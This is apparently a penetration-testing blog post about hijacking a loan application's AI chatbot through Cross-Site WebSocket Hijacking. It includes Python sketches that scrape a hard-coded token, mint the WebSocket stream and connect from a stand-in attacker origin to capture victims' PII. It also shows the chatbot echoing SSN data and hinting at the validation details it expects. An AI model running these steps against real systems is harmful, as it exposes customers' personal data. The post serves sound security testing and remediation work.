Ignoring the little stuff is never a good idea. Anyone who has pretended that the small noise their car engine is making is unimportant, only to later find themselves stuck on the side of the road with a dead motor, will understand this statement.
The same holds true when it comes to dealing with minor vulnerabilities in a web application. Several small issues that alone do not amount to much can in fact prove dangerous, if not fatal, when strung together by a threat actor. And much like the driver who did not want to admit that his car was having problems, it can be difficult to explain to a client that action is needed to correct a situation before it becomes a major headache.
So, today we are going to show how Trustwave SpiderLabs penetration testers go about connecting the dots in a way that can be explained to a client, using several discovered vulnerabilities that, if exploited, would have exposed highly valuable customer data.
Hiding in Plain Sight
SpiderLabs was in the process of testing a loan lending application, developed by a major IT solutions company, that came with two generic Mailinator accounts. The client informed us that the application was under development and currently broken. After several days of testing, we did not find any standout issues, only some low-severity problems. This was partly due to the scope restrictions and insufficient privileges provided by the client, and to having to work with a broken application overall.
However, while conducting additional pre-authentication tests, SpiderLabs observed a small chat box hidden in the corner of the application. It was hard to spot, as it was the same color as the website and thus not easily visible.
What we found was a chatbot. To our surprise, it was possible to use the chatbot to interact in depth with the client’s loan lending system. The chatbot did not ask for any credentials to log into the application.
Instead, the chatbot’s Artificial Intelligence (AI) allowed users to simply identify themselves by first name, last four digits of their Social Security Number (SSN), and a zip code.
Does anyone think these parameters were strong enough for validation?
Much to our surprise, further investigation revealed that the chatbot was hosted on a domain outside the scope of the test! In fact, the chatbot was also communicating with another domain that was not in scope.
SpiderLabs immediately zeroed in on the application’s dodgy and very vulnerable design. Our next step was to speak with the client. At this point, SpiderLabs was well beyond the test’s initial scope, so we told the client that we would stop here and go no further.
Digging Deeper into the Problem
As we continued our research, we observed that the chatbot would echo back whatever was typed in and would offer alternate data options to validate the user input against the loan lending system.
This happened because the chat system was designed to be verbose and powerful enough to interact with the loan lending application without requiring a login. This amounted to excessive features and authority granted to the chatbot, which SpiderLabs exploited. Oddly, the fact that this was a very helpful AI made it easier for us to exploit the chatbot by trial and error.
Following is a snapshot of it:
Figure 1. Loan Lending Chatbot Application.
We soon observed that the chatbot was communicating over WebSocket, and that the WebSocket stream was established before anything was even typed into the chatbot, as shown below. Here is the catch!
Figure 2. Chatbot WebSocket stream
Why is this a problem? If the WebSocket stream is generated before the chat starts, the stream is already live, and the attacker just needs to capture the wss:// URL highlighted in red above. Exactly how, and the dependencies involved, are explained later in this blog.
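Capturing the stream can be as simple as grepping proxied traffic for the wss:// URL. Below is a minimal Python sketch of that idea; the URL shape and the `t` token parameter are assumptions for illustration, not the client's real scheme.

```python
import re
from urllib.parse import parse_qs, urlparse

def extract_stream(capture: str):
    """Pull the wss:// stream URL, and any token embedded in it, out of
    captured proxy traffic. The 't' query parameter name is a hypothetical
    stand-in for the token highlighted in Figure 2."""
    match = re.search(r"wss://[^\s\"']+", capture)
    if not match:
        return None
    url = match.group(0)
    token = parse_qs(urlparse(url).query).get("t", [None])[0]
    return {"url": url, "token": token}
```

For example, feeding it a captured handshake line such as `GET wss://chat.example.com/stream?t=abc123 HTTP/1.1` yields both the stream URL and the token an attacker would reuse.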
The Origin header for the WebSocket handshake was not validated, but the handshake did use a unique token. So, how do we get the tokens, or generate the stream highlighted above, if we want to hijack the chatbot conversation? We left it there for a few hours and poked around in other areas of the application, identifying items like Arbitrary File Upload, Weak Input Validation, Sensitive Data in URL, Email Enumeration and, interestingly, SSN Enumeration.
Digging into the business logic, the customer gifted us a finding: changes underway in the development environment had introduced an issue that did not exist before. A loan application was submitted using the user account <user1>@mailinator.com and mapped to a user. The backend application team later changed the profile, as SpiderLabs had not been given the standard user or admin privileges to make the change ourselves.
We noticed that this new profile could access loan contract statements generated by the previously mapped user. Multiple application routes were affected by this business logic flaw, allowing steps to be skipped and unauthorized changes to be made to loan applications and contract statements.
So now, let’s come back to the WebSocket handshake, which looked vulnerable at first sight. This design flaw could have been avoided if the token and stream had been generated after, not before, the chat session opened, with CSRF protection and a whitelisted Origin header. There also appeared to be no separate session differentiating events occurring before and after the user provided validation input to the chatbot.
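The missing checks can be sketched as a server-side handshake validator. This is a minimal illustration of the controls whose absence enabled the hijack; the origin whitelist and header names are assumptions, not the client's real values.

```python
import hmac

# Hypothetical application origin; a real deployment would whitelist
# only its own front-end domains.
ALLOWED_ORIGINS = {"https://loans.example.com"}

def validate_handshake(headers: dict, session_csrf_token: str) -> bool:
    """Reject a WebSocket upgrade unless it passes both missing checks."""
    # 1. Whitelist the Origin header instead of accepting any cross-site page.
    if headers.get("Origin") not in ALLOWED_ORIGINS:
        return False
    # 2. Require a per-session anti-CSRF token minted only AFTER the chat
    #    session opens, never one hard-coded in the page source.
    supplied = headers.get("X-CSRF-Token", "")
    return hmac.compare_digest(supplied, session_csrf_token)
```

With checks like these in place, the pre-generated stream we captured would have been useless from an attacker-controlled page.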
Our analysis showed that once an attacker hijacks the wss:// stream, they would have a one-hour window in which to silently wait until the chatbot, or any customer using that stream, starts texting, at which point the conversation would automatically flow to the attacker-controlled client.
We attempted to execute a Cross-Site WebSocket Hijacking (CSWSH) attack. This is essentially a Cross-Site Request Forgery (CSRF) vulnerability on a WebSocket handshake, and it arises when the handshake relies on cookies for session handling and lacks an anti-CSRF token. In this case, however, we had an unvalidated Origin header, multiple tokens, and the handshake wasn’t even cookie-based, as an Authorization header was used. So, was it a dead end for us? No, in fact it opened a few doors.
SpiderLabs stumbled upon an authentication bug. Personally Identifiable Information (PII), application routes, multiple APIs and their keys, secure keys, templates, emails, usernames, tenant details, loan transaction parameters, and more were all available without authentication. The sensitive information exposed in server responses, coupled with the authentication bug, made it much easier to hijack the WebSocket!
Analyzing the application workflow, this is how the WebSocket stream was generated:
Step 1: A WebSocket token was hard-coded in the client-side HTML source of the chatbot, as shown below:
Figure 3. Hard-Coded Token in Source Code
Step 2: The above token was used to generate the next POST body token, as shown below:
Figure 4. POST Body Token Generated using the Hard-Coded Token in Step 1
Step 3: The token generated from the POST body in Step 2 became the Authorization Bearer token, finally providing the WebSocket stream.
Figure 5. WebSocket Stream Generation using Token from Step 2 sent as a request
Figure 6. WebSocket Stream Generation response from the request in Figure 5
So, connecting all the dots confirmed that we could indeed hijack the chatbot conversation! A simple script could be written to scrape the hard-coded tokens and issue the interim requests to generate the WebSocket stream, but we wanted to highlight the design flaw to the client, hence the step-by-step approach shown above.
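Such a script might look something like the sketch below. The endpoints, the `data-token` attribute, and the JSON field names are all placeholders standing in for the client's real routes; only the three-step token chain mirrors what we observed.

```python
import json
import re
import urllib.request

CHATBOT_URL = "https://chatbot.example.com/widget"  # hypothetical endpoint

def extract_hardcoded_token(html: str):
    """Step 1: pull the token embedded in the chatbot's HTML source.
    The 'data-token' attribute name is an assumption for illustration."""
    match = re.search(r'data-token="([^"]+)"', html)
    return match.group(1) if match else None

def post_json(url, payload, headers=None):
    """Small helper: POST a JSON body and decode the JSON response."""
    req = urllib.request.Request(
        url,
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json", **(headers or {})},
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)

def build_stream():
    """Chain the three observed steps to mint a wss:// stream URL."""
    html = urllib.request.urlopen(CHATBOT_URL).read().decode()
    seed = extract_hardcoded_token(html)                                  # step 1
    body_token = post_json(f"{CHATBOT_URL}/token", {"seed": seed})["token"]  # step 2
    grant = post_json(f"{CHATBOT_URL}/stream", {},                        # step 3
                      {"Authorization": f"Bearer {body_token}"})
    return grant["streamUrl"]
```

The point of the sketch is that none of the three steps requires an authenticated user, which is the heart of the design flaw.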
Some vulnerabilities are detected using out-of-band security testing, where an application can be induced to retrieve content from an external system, causing DNS/HTTP/SMTP interactions and thus leaking sensitive data. Therefore, we used the following setup to perform the test (image taken from portswigger.net):
Figure 7. Out of Band (OOB) Test Setup
The CSWSH attack script was created as shown below:
Figure 8. CSWSH Proof of Concept
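Figure 8 shows the actual PoC. As a rough illustration of the same idea, the Python sketch below connects to the captured stream from an attacker-controlled origin (accepted, since the server never validated Origin) and passively logs whatever flows through. It assumes the third-party `websockets` package; the SSN-masking helper mirrors the masking applied to the evidence in Figure 9.

```python
import re

# Matches SSN-like values so captured evidence can be masked before reporting.
SSN_RE = re.compile(r"\b\d{3}-?\d{2}-?\d{4}\b")

def mask_pii(message: str) -> str:
    """Mask SSN-like values in captured traffic."""
    return SSN_RE.sub("***-**-****", message)

async def hijack(stream_url: str) -> None:
    """Connect to the captured wss:// stream and quietly wait for the
    victim's conversation to arrive. The origin below is a placeholder;
    the vulnerable server accepted any value."""
    import websockets  # third-party; imported lazily to keep the sketch light
    async with websockets.connect(
        stream_url, origin="https://attacker.example.net"
    ) as ws:
        async for message in ws:
            print("captured:", mask_pii(message))
```

In our engagement the "attack" really was this passive: open the socket, then wait for the chatbot to relay PII.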
As a result of the successful CSWSH attack, evidence showed that sensitive PII (masked) was sent from the target to the attacker-controlled collaborator client.
Figure 9. Attacker-Controlled Burp Collaborator Client
Note the magic here: CSRF would normally need an authenticated session. In this case, the WebSocket stream was already generated, with all tokens, before the user even started communicating with the chatbot. Simply loading the webpage (without entering any credentials) quietly starts the chatbot's web stream in the background. When interacting with the chatbot, the victim provides only the last four digits of their SSN (the rest can be replaced with *), a property zip code (which can be Googled to build a brute-force list), and a first name, which is easily populated. To make it even easier, the client had previously provided some sample dummy data.
After the victim provides the validation (which the chatbot helpfully offers a hint for if it is wrong!), the token is live for an hour, giving the attacker a one-hour window in which to exploit the vulnerability.
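To put numbers on how weak this validation scheme is, here is a back-of-the-envelope sketch. The counts for first names and zip codes are illustrative; the point is that every factor is either public or tiny.

```python
def validation_search_space(num_first_names: int, num_zip_codes: int) -> int:
    """Total candidate identities an attacker must try against the chatbot:
    first name x last-4 of SSN x zip code."""
    ssn_suffixes = 10 ** 4  # every possible last-4 of an SSN
    return num_first_names * ssn_suffixes * num_zip_codes

# e.g. 100 common first names and 50 zip codes scraped from Google --
# entirely brute-forceable, and the chatbot even hints on wrong guesses.
space = validation_search_space(100, 50)
```

Compare that with a proper credential: even a modest password policy puts the search space many orders of magnitude higher, and a correct design would rate-limit and lock out long before the space is exhausted.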
The attacker would create a malicious page on a domain they control, which would then establish a cross-site WebSocket connection to the vulnerable chatbot. The chatbot would handle the connection in the context of the victim user's session. The attacker's page could then send arbitrary messages to the server as well as read the contents of the messages received from it.
So, unlike a standard CSRF vulnerability, the attacker here creates a two-way interaction with the compromised chatbot application. In our case, we just created the socket connection and waited! The conversation between the customer and the AI, which foolishly repeated the customer's PII in every exchange, automatically flowed to our Collaborator client!
However, the story does not end here.
An interesting observation was that the chatbot communicated with two WebSockets on different domains. The second WebSocket was used for cognitive speech services, meaning the chatbot could listen and talk to us! SpiderLabs observed that whatever was spoken was uploaded to the second WebSocket domain as an audio stream, then forwarded to the first WebSocket domain and converted into the “type” attribute, which is why the message appears in the chatbot. Essentially, it was a speech-to-text function.
By the way, even the second WebSocket was vulnerable. We started dreaming of achieving code execution just by talking to the socket, but at that point something hilarious happened. While we were testing the chatbot, our private conversation was captured by the chatbot's audio speech service, resulting in the chatbot shamelessly intruding into our conversation and asking, “Sorry, can you repeat that again?” This example truly shows the extent to which AI could be used not only to compromise systems but also to intrude on personal lives!
If you would like to learn more about these attacks, portswigger.net has a very good tutorial.
At this point, with HTTP and DNS lookups received on our Collaborator end, the natural next step would have been Server-Side Request Forgery (SSRF), but because the external domains were not under the client’s control, we had to draw the line and stop there. We had already reached a proof of concept sufficient to prove the hijack.
Further, this application had more juice: a Google Maps API key was retrieved and used as a sample to demonstrate billing over-consumption. Open-Source Intelligence (OSINT) research on the web led to the following reference table of costs borne per individual API exploit:
Figure 10. Cost Table/Reference to Exploit
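The over-consumption math behind a table like Figure 10 is straightforward. In this sketch, the per-1,000-request prices are illustrative placeholders, not Google's current rates, and the API names are generic labels.

```python
# Illustrative per-1,000-request prices (placeholders, not real billing rates).
PRICE_PER_1000 = {
    "staticmap": 2.00,
    "directions": 5.00,
    "places_autocomplete": 2.83,
}

def abuse_cost(api: str, requests_made: int) -> float:
    """Billing an attacker can run up against a leaked, unrestricted key."""
    return round(PRICE_PER_1000[api] / 1000 * requests_made, 2)
```

For instance, a leaked key hammered with a million directions requests would, at the placeholder rate above, cost the victim thousands of dollars, which is why key restriction and quota alerts matter as much as the leak itself.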
SpiderLabs performed a limited scope attack using the tool ‘gmapsapiscanner’ (https://github.com/ozguralp/gmapsapiscanner) as shown below:
Figure 11. Google Map API Scanning for Vulnerable Endpoints
The CAPTCHA validation system was also bypassed by simply changing a “disabled” attribute on the client side. So, we already enjoyed a brute-force window!
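The fix is to enforce the CAPTCHA on the server, so that flipping a client-side attribute changes nothing. A minimal sketch, where `verify_captcha` is a stand-in for a real provider-side verification call:

```python
def handle_login(form: dict, verify_captcha) -> str:
    """Enforce CAPTCHA server-side on every submission. The client-side
    state of the widget (enabled or 'disabled') is never trusted."""
    token = form.get("captcha_token")
    if not token or not verify_captcha(token):
        return "rejected"  # no valid CAPTCHA token, no login attempt
    return "continue"
```

Because the check runs on the server against the submitted token, removing or disabling the widget in the browser still yields a rejection, closing the brute-force window.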
With findings ranging from low-severity issues to critical bugs, and a lot of satisfaction, the report ended up looking like this:
Figure 14. Report Vulnerabilities Summary
The moral of the story: put a lot of emphasis on enumeration, connect the dots, and chain individual vulnerabilities wherever possible so that the actual impact of the risk can be demonstrated to customers.